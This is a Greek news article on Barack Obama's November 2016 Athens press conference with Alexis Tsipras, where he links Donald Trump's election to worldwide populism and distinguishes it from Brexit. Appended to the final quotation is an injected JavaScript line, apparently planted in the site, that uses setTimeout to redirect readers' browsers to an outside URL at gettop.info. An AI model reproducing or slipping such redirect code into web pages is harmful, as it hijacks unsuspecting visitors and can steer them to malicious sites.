Ομπάμα: Για την εκλογή Τραμπ «φταίει»ο λαϊκισμός

0
12
Ο Πρωθυπουργός Αλέξης Τσίπρας (Δ) με τον Πρόεδρο των Ηνωμένων Πολιτειών της Αμερικής, Μπάρακ Ομπάμα (Α), ανταλλάσουν χειραψία κατά τη διάρκεια των κοινών δηλώσεων μετά τη συνάντησή τους, στο Μέγαρο Μαξίμου, Αθήνα Τρίτη 15 Νοεμβρίου 2016. Έφτασε στην Ελλάδα ο Μπαράκ Ομπάμα, πρώτος σταθμός στο τελευταίο του ταξίδι στην Ευρώπη ως Πρόεδρος των ΗΠΑ, ενώ θα ακολουθήσει η επίσκεψή του στη Γερμανία. Ο Μπαράκ Ομπάμα, είναι ο τέταρτος πρόεδρος των ΗΠΑ που επισκέπτεται την Αθήνα, δεκαεπτά χρόνια μετά την επίσκεψη του Μπιλ Κλίντον . ΑΠΕ-ΜΠΕ/ΑΠΕ-ΜΠΕ/ΟΡΕΣΤΗΣ ΠΑΝΑΓΙΩΤΟΥ

 

Στην κοινή συνέντευξη Τύπου με τον Αλέξη Τσίπρα ο Μπαράκ Ομπάμα ρωτήθηκε από δημοσιογράφο του ABC σχετικά με την εκλογή του Ντόναλντ Τραμπ και τις διαδηλώσεις που ακολούθησαν και βρίσκοντααι ακόμα σε εξέλιξη.

Όπως είπε χαρακτηριστικά: Η εκλογή του Ντόναλντ Τραμπ δεν μπορεί να ταυτιστεί με το Brexit γιατί πρόκειται για δύο διαφορετικά πράγματα. Διευκρίνισε, ωστόσο ότι μπορεί να υπάρχουν μερικά κοινά στοιχεία.

Όπως τόνισε ο Αμερικανός πρόεδρος, οι συνθήκες σε όλο τον κόσμο ευνόησαν τον λαϊκισμό. Πρόκειται για μια αβέβαιη κατάσταση που δεν ξέρουμε που οδηγεί, συμπλήρωσε ο Ομπάμα, εξηγώντας ότι αυτές οι τάσεις υπήρχαν και είναι καθήκον των ηγετών να σκύψουν στις ανάγκες των πολιτών.

«Είδα θυμό και αγωνία στους Αμερικανούς, όταν έχασαν τα σπίτια τους ή τις συντάξεις τους και οι τιμές των ακινήτων κατέρρευσαν, αλλά ανακάμψαμε», ανέφερε ο Αμερικανός πρόεδρος, καταλήγοντας ότι ο Τραμπ κέρδισε τις εκλογές και διεύρυνε την εκλογική του βάση εξαιτίας των λαϊκίστικων δηλώσεων που έκανε που φούντωναν το θυμό και την αγωνία του λαού.

Θα πρέπει να ορθώσουμε το ανάστημά μας απέναντι στον εθνικισμό, δήλωσε ο Μπαράκ Ομπάμα. «Μία ισχυρή πλειοψηφία συμφωνεί με εμένα, αλλά πολλές φορές ο κόσμος έχει ανάγκη να δοκιμάσει κάτι διαφορετικό», δήλωσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here